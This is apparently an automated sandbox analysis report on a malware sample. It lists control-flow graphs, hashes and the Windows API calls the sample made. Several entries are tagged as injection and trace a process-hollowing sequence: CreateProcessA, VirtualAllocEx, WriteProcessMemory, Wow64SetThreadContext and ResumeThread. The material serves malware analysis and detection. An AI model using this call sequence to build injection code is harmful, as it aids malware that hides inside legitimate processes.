32891->32892 32893 8e3f952 32892->32893 32894 8e3f8a8 PostMessageW 32892->32894 32893->32881 32894->32893 32896 8e3fc28 PostMessageW 32895->32896 32898 8e3fc94 32896->32898 32898->32889 32899 8d44ef8 32900 8d44f2e 32899->32900 32901 8d44fee 32900->32901 32904 8d4e690 32900->32904 32908 8d4e6a0 32900->32908 32905 8d4e6e3 32904->32905 32906 8d4e732 32905->32906 32907 8d4e701 MonitorFromPoint 32905->32907 32906->32901 32907->32906 32909 8d4e6e3 32908->32909 32910 8d4e701 MonitorFromPoint 32909->32910 32911 8d4e732 32909->32911 32910->32911 32911->32901

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 069309F8 Relevance: .6, Instructions: 626COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1617472167.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_6930000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 41a847a6191c1bf4d8347c7bdb3452efbc4f34ba799e34f254653905cef1afd1
                                                                                                                                                                      • Instruction ID: ba090dedf97e4ab4b076d53291a9698cab0c67bf2c3b409dd4e0700848e42521
                                                                                                                                                                      • Opcode Fuzzy Hash: 41a847a6191c1bf4d8347c7bdb3452efbc4f34ba799e34f254653905cef1afd1
                                                                                                                                                                      • Instruction Fuzzy Hash: 7332AC70B013188FDB68DBA9D450BAEB7FAAF89300F244469E146DB7A1CB35ED41CB51
                                                                                                                                                                      Function 08E3CACC Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1604 8e3cacc-8e3cb6d 1607 8e3cba6-8e3cbc6 1604->1607 1608 8e3cb6f-8e3cb79 1604->1608 1613 8e3cbc8-8e3cbd2 1607->1613 1614 8e3cbff-8e3cc2e 1607->1614 1608->1607 1609 8e3cb7b-8e3cb7d 1608->1609 1611 8e3cba0-8e3cba3 1609->1611 1612 8e3cb7f-8e3cb89 1609->1612 1611->1607 1615 8e3cb8b 1612->1615 1616 8e3cb8d-8e3cb9c 1612->1616 1613->1614 1617 8e3cbd4-8e3cbd6 1613->1617 1624 8e3cc30-8e3cc3a 1614->1624 1625 8e3cc67-8e3cd21 CreateProcessA 1614->1625 1615->1616 1616->1616 1618 8e3cb9e 1616->1618 1619 8e3cbf9-8e3cbfc 1617->1619 1620 8e3cbd8-8e3cbe2 1617->1620 1618->1611 1619->1614 1622 8e3cbe6-8e3cbf5 1620->1622 1623 8e3cbe4 1620->1623 1622->1622 1626 8e3cbf7 1622->1626 1623->1622 1624->1625 1627 8e3cc3c-8e3cc3e 1624->1627 1636 8e3cd23-8e3cd29 1625->1636 1637 8e3cd2a-8e3cdb0 1625->1637 1626->1619 1628 8e3cc61-8e3cc64 1627->1628 1629 8e3cc40-8e3cc4a 1627->1629 1628->1625 1631 8e3cc4e-8e3cc5d 1629->1631 1632 8e3cc4c 1629->1632 1631->1631 1633 8e3cc5f 1631->1633 1632->1631 1633->1628 1636->1637 1647 8e3cdb2-8e3cdb6 1637->1647 1648 8e3cdc0-8e3cdc4 1637->1648 1647->1648 1649 8e3cdb8 1647->1649 1650 8e3cdc6-8e3cdca 1648->1650 1651 8e3cdd4-8e3cdd8 1648->1651 1649->1648 1650->1651 1652 8e3cdcc 1650->1652 1653 8e3cdda-8e3cdde 1651->1653 1654 8e3cde8-8e3cdec 1651->1654 1652->1651 1653->1654 1655 8e3cde0 1653->1655 1656 8e3cdfe-8e3ce05 1654->1656 1657 8e3cdee-8e3cdf4 1654->1657 1655->1654 1658 8e3ce07-8e3ce16 1656->1658 1659 8e3ce1c 1656->1659 1657->1656 1658->1659 1661 8e3ce1d 1659->1661 1661->1661
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08E3CD0E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 688d4c5dbfe4218effc8c4b6cfa1637b8883c82768f947547abc79e39e802054
                                                                                                                                                                      • Instruction ID: f8a8456449e01ad3e295183260a3ca5d4f320ba27b5c483b471f492386d3606e
                                                                                                                                                                      • Opcode Fuzzy Hash: 688d4c5dbfe4218effc8c4b6cfa1637b8883c82768f947547abc79e39e802054
                                                                                                                                                                      • Instruction Fuzzy Hash: A9A17B72D003299FEB24CF68C845BEDBBB2BF48315F148569E848B7240DB749985CF91
                                                                                                                                                                      Function 08E3CAD8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1662 8e3cad8-8e3cb6d 1664 8e3cba6-8e3cbc6 1662->1664 1665 8e3cb6f-8e3cb79 1662->1665 1670 8e3cbc8-8e3cbd2 1664->1670 1671 8e3cbff-8e3cc2e 1664->1671 1665->1664 1666 8e3cb7b-8e3cb7d 1665->1666 1668 8e3cba0-8e3cba3 1666->1668 1669 8e3cb7f-8e3cb89 1666->1669 1668->1664 1672 8e3cb8b 1669->1672 1673 8e3cb8d-8e3cb9c 1669->1673 1670->1671 1674 8e3cbd4-8e3cbd6 1670->1674 1681 8e3cc30-8e3cc3a 1671->1681 1682 8e3cc67-8e3cd21 CreateProcessA 1671->1682 1672->1673 1673->1673 1675 8e3cb9e 1673->1675 1676 8e3cbf9-8e3cbfc 1674->1676 1677 8e3cbd8-8e3cbe2 1674->1677 1675->1668 1676->1671 1679 8e3cbe6-8e3cbf5 1677->1679 1680 8e3cbe4 1677->1680 1679->1679 1683 8e3cbf7 1679->1683 1680->1679 1681->1682 1684 8e3cc3c-8e3cc3e 1681->1684 1693 8e3cd23-8e3cd29 1682->1693 1694 8e3cd2a-8e3cdb0 1682->1694 1683->1676 1685 8e3cc61-8e3cc64 1684->1685 1686 8e3cc40-8e3cc4a 1684->1686 1685->1682 1688 8e3cc4e-8e3cc5d 1686->1688 1689 8e3cc4c 1686->1689 1688->1688 1690 8e3cc5f 1688->1690 1689->1688 1690->1685 1693->1694 1704 8e3cdb2-8e3cdb6 1694->1704 1705 8e3cdc0-8e3cdc4 1694->1705 1704->1705 1706 8e3cdb8 1704->1706 1707 8e3cdc6-8e3cdca 1705->1707 1708 8e3cdd4-8e3cdd8 1705->1708 1706->1705 1707->1708 1709 8e3cdcc 1707->1709 1710 8e3cdda-8e3cdde 1708->1710 1711 8e3cde8-8e3cdec 1708->1711 1709->1708 1710->1711 1712 8e3cde0 1710->1712 1713 8e3cdfe-8e3ce05 1711->1713 1714 8e3cdee-8e3cdf4 1711->1714 1712->1711 1715 8e3ce07-8e3ce16 1713->1715 1716 8e3ce1c 1713->1716 1714->1713 1715->1716 1718 8e3ce1d 1716->1718 1718->1718
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08E3CD0E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 1206225ca84d6ea1310b08e235ccbc1db8c6b1482d7a9af6ab6ec42c5124fa04
                                                                                                                                                                      • Instruction ID: 2949ef67c2e3f78c8a41cb3a35b1c9e84d63fdeaa40c745120dcee07f5d7fe9d
                                                                                                                                                                      • Opcode Fuzzy Hash: 1206225ca84d6ea1310b08e235ccbc1db8c6b1482d7a9af6ab6ec42c5124fa04
                                                                                                                                                                      • Instruction Fuzzy Hash: 41915B72D003299FEB24CF68C845BEDBBB2BF48315F148569E808B7240DB759985CF91
                                                                                                                                                                      Function 00868FE4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1719 868fe4-8690b1 CreateActCtxA 1721 8690b3-8690b9 1719->1721 1722 8690ba-869114 1719->1722 1721->1722 1729 869116-869119 1722->1729 1730 869123-869127 1722->1730 1729->1730 1731 869138 1730->1731 1732 869129-869135 1730->1732 1734 869139 1731->1734 1732->1731 1734->1734
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 008690A1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1546244244.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_860000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: f3a29416aca01eaf03ac8fc30fc216a6c19166c2ffc4048cd36853457b49adfa
                                                                                                                                                                      • Instruction ID: f0932b73c43472f370e0cd755c429d4f56da058c7fd368ac0142d9572a1c2543
                                                                                                                                                                      • Opcode Fuzzy Hash: f3a29416aca01eaf03ac8fc30fc216a6c19166c2ffc4048cd36853457b49adfa
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F41E1B0C00719CBEB24DFA9C844BDDBBB5FF49314F20816AD448AB291DB75594ACF50
                                                                                                                                                                      Function 00867BAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1735 867bac-8690b1 CreateActCtxA 1738 8690b3-8690b9 1735->1738 1739 8690ba-869114 1735->1739 1738->1739 1746 869116-869119 1739->1746 1747 869123-869127 1739->1747 1746->1747 1748 869138 1747->1748 1749 869129-869135 1747->1749 1751 869139 1748->1751 1749->1748 1751->1751
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 008690A1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1546244244.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_860000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 1c69df7f44561fc33c72373fa6ebec681b607ec2479165098a571f8158c87bd0
                                                                                                                                                                      • Instruction ID: 4a9bc8482eb40f78f7d9624839da07af03246eac9cddfb876c1ff18d6c149362
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c69df7f44561fc33c72373fa6ebec681b607ec2479165098a571f8158c87bd0
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E41C070C00729CBEB24DFA9C84479EBBB5FF49304F20816AD408AB291DB75694ACF90
                                                                                                                                                                      Function 08D4AA30 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1752 8d4aa30-8d4aa84 1754 8d4aa86-8d4aa8c 1752->1754 1755 8d4aa8f-8d4aa9e 1752->1755 1754->1755 1756 8d4aaa0 1755->1756 1757 8d4aaa3-8d4aadc DrawTextExW 1755->1757 1756->1757 1758 8d4aae5-8d4ab02 1757->1758 1759 8d4aade-8d4aae4 1757->1759 1759->1758
                                                                                                                                                                      APIs
                                                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,08D4AA1D,?,?), ref: 08D4AACF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1622756840.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8d40000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DrawText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                                                      • Opcode ID: 91578c44dd4f86ce202f0e30e715bfb65eeaeb4d87c392218fe8dbd57a0c4f4c
                                                                                                                                                                      • Instruction ID: 7233c4e3f2ca7544bed23400f8d26edb021eca7ce590212f570bf2d1ecec43bf
                                                                                                                                                                      • Opcode Fuzzy Hash: 91578c44dd4f86ce202f0e30e715bfb65eeaeb4d87c392218fe8dbd57a0c4f4c
                                                                                                                                                                      • Instruction Fuzzy Hash: 8531DFB5D002099FDB10CF9AD885AEEBBF5EB48360F14842AE918A7210D775A945CFA0
                                                                                                                                                                      Function 08D49A34 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1762 8d49a34-8d4aa84 1764 8d4aa86-8d4aa8c 1762->1764 1765 8d4aa8f-8d4aa9e 1762->1765 1764->1765 1766 8d4aaa0 1765->1766 1767 8d4aaa3-8d4aadc DrawTextExW 1765->1767 1766->1767 1768 8d4aae5-8d4ab02 1767->1768 1769 8d4aade-8d4aae4 1767->1769 1769->1768
                                                                                                                                                                      APIs
                                                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,08D4AA1D,?,?), ref: 08D4AACF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1622756840.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8d40000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DrawText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                                                      • Opcode ID: 7509491a525955e8aa384c7ebf23a640547f3c497973d9051573f8bf19670494
                                                                                                                                                                      • Instruction ID: 9a620a112d186436c101ba3c44824092944e2f9d200936d101b3c2ccf44dea1f
                                                                                                                                                                      • Opcode Fuzzy Hash: 7509491a525955e8aa384c7ebf23a640547f3c497973d9051573f8bf19670494
                                                                                                                                                                      • Instruction Fuzzy Hash: 6B3100B5D003099FDB10CF9AD884AAEBBF5FB48360F14842EE918A7310D774A945CFA0
                                                                                                                                                                      Function 08E3C848 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1772 8e3c848-8e3c89e 1774 8e3c8a0-8e3c8ac 1772->1774 1775 8e3c8ae-8e3c8ed WriteProcessMemory 1772->1775 1774->1775 1777 8e3c8f6-8e3c926 1775->1777 1778 8e3c8ef-8e3c8f5 1775->1778 1778->1777
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08E3C8E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: ac2e156fb2562ecaeb5e2d0127ab97e8d760aefe7a202f445b9543b669a18aca
                                                                                                                                                                      • Instruction ID: b94625c809928bfbe5c5732e581fe368661fe0658f5f1e15f074f12d487de5f1
                                                                                                                                                                      • Opcode Fuzzy Hash: ac2e156fb2562ecaeb5e2d0127ab97e8d760aefe7a202f445b9543b669a18aca
                                                                                                                                                                      • Instruction Fuzzy Hash: AD213776D003599FDB20CFA9C885BEEBBF1FF48310F148429E959A7240C779A945CB64
                                                                                                                                                                      Function 08E3C850 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08E3C8E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: 4765371370f05e826b0f2f7964fd785d2d027513b8e1cdf2579a6c525e9f4359
                                                                                                                                                                      • Instruction ID: e0f759f16ac9fe0aaf4fd0e0254734f870516787f959a01a8bc38b411442078b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4765371370f05e826b0f2f7964fd785d2d027513b8e1cdf2579a6c525e9f4359
                                                                                                                                                                      • Instruction Fuzzy Hash: D0213975D003199FDB10DFA9C885BDEBBF5FF48310F508429E918A7240C779A954CBA4
                                                                                                                                                                      Function 08E3C939 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08E3C9C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 1c3b385af86fca005505df5459ff1ab6c65e63fd512e754733174db9517b7aa8
                                                                                                                                                                      • Instruction ID: e54bf198e6e0034b973dabb0e1de0b5ab984f068717349e9580d74ecae4eede4
                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3b385af86fca005505df5459ff1ab6c65e63fd512e754733174db9517b7aa8
                                                                                                                                                                      • Instruction Fuzzy Hash: D8212471D007599FDB20DFAAC885BEEBBF1FF48310F50842AE959A7250C7399941CBA4
                                                                                                                                                                      Function 08E3C6B0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 08E3C736
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 71ba2615bcd36db9ce13845da0b934422685149d361e63838229edddf70e1df7
                                                                                                                                                                      • Instruction ID: e92b17f959346e589be575edd630aee2acdd33363747fa36675c46972c480a51
                                                                                                                                                                      • Opcode Fuzzy Hash: 71ba2615bcd36db9ce13845da0b934422685149d361e63838229edddf70e1df7
                                                                                                                                                                      • Instruction Fuzzy Hash: FB214871D003098FDB20DFAAC4857EEBBF5EB48314F54842AD859A7240CB789945CFA5
                                                                                                                                                                      Function 08D4E690 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 08D4E71F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1622756840.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8d40000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FromMonitorPoint
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1566494148-0
                                                                                                                                                                      • Opcode ID: 336430fc5fdafa6cfcd03210e0d71f257950bf5d7589d96a76818aa9165150db
                                                                                                                                                                      • Instruction ID: f73c506d7e32304ed071b75f3d1478903d40ba512e47835a63a563387152fbe4
                                                                                                                                                                      • Opcode Fuzzy Hash: 336430fc5fdafa6cfcd03210e0d71f257950bf5d7589d96a76818aa9165150db
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D217AB4D042889FDB20DFA9D445BEEBFF1FB49360F24841AD455AB281C3396905CFA1
                                                                                                                                                                      Function 08D4E6A0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 08D4E71F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1622756840.0000000008D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 08D40000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8d40000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FromMonitorPoint
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1566494148-0
                                                                                                                                                                      • Opcode ID: 448a5061c12af9bec4924097bfba328ccf16ed10cae96dda5bf3da39166a8771
                                                                                                                                                                      • Instruction ID: 2749d71f03b9e1728cafe969ae0cc513ec480c641caa7cacc642e2454e845273
                                                                                                                                                                      • Opcode Fuzzy Hash: 448a5061c12af9bec4924097bfba328ccf16ed10cae96dda5bf3da39166a8771
                                                                                                                                                                      • Instruction Fuzzy Hash: D2216074E002489FDB20DFA9D449BAEFBF5FB48360F10841AE955A7380C779A905CFA1
                                                                                                                                                                      Function 08E3C940 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08E3C9C0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: dadda874d48a2d1de3a1f0e8c6c7e571f15f68a6fcdbd4f7a4676e6d0ee6e6c7
                                                                                                                                                                      • Instruction ID: ff4def82ff01dd4474b9699eff3c23d62588df0bfb85f4f10f11865444623fc4
                                                                                                                                                                      • Opcode Fuzzy Hash: dadda874d48a2d1de3a1f0e8c6c7e571f15f68a6fcdbd4f7a4676e6d0ee6e6c7
                                                                                                                                                                      • Instruction Fuzzy Hash: 30212571D003599FDB10DFAAC885BEEBBF5FF48310F50842AE958A7250C739A901CBA4
                                                                                                                                                                      Function 08E3C6B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNELBASE(?,00000000), ref: 08E3C736
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: cefae3ed90e724fb40652b2e3902f0a4a8f57822d4355fcb1420687e13dacd9d
                                                                                                                                                                      • Instruction ID: f55b0dddc85fc9fe9d91147eba8390634319ea1b6ea16189564ebf3d16f11724
                                                                                                                                                                      • Opcode Fuzzy Hash: cefae3ed90e724fb40652b2e3902f0a4a8f57822d4355fcb1420687e13dacd9d
                                                                                                                                                                      • Instruction Fuzzy Hash: 1C211875D003098FDB10DFAAC4857AEBBF5EF48314F54842ED959A7240CB789945CFA4
                                                                                                                                                                      Function 08E3C788 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08E3C7FE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: b0df3e288c7913ec1d9d739e51ccc4df4a58515f09638f1ab77ac7442a590107
                                                                                                                                                                      • Instruction ID: d096add8a4b29e15c2aefd3db0f7a2bfa3c2b21dd5ce05837cf5d10842eff2fb
                                                                                                                                                                      • Opcode Fuzzy Hash: b0df3e288c7913ec1d9d739e51ccc4df4a58515f09638f1ab77ac7442a590107
                                                                                                                                                                      • Instruction Fuzzy Hash: 53112976D003499FDB20DFAAC845BDEBBF5EF88310F248419E519A7250C779A950CFA4
                                                                                                                                                                      Function 08E3C600 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000016.00000002.1623364226.0000000008E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E30000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_22_2_8e30000_YRtQgzFlDnVSru.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 0264893a98ce3e41ba0771a90469f49aa97cccbd796369204687fe12f33e1d31
                                                                                                                                                                      • Instruction ID: 8b5483e1197f3476a4c367ff51cbe758f718a26481f75cdf59dfb891ea4cf12e
                                                                                                                                                                      • Opcode Fuzzy Hash: 0264893a98ce3e41ba0771a90469f49aa97cccbd796369204687fe12f33e1d31
                                                                                                                                                                      • Instruction Fuzzy Hash: A7114971D007098FDB20DFAAC44579EFBF5EB88314F208419D559A7240CB35A941CFA4
                                                                                                                                                                      Function 08E3C790 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
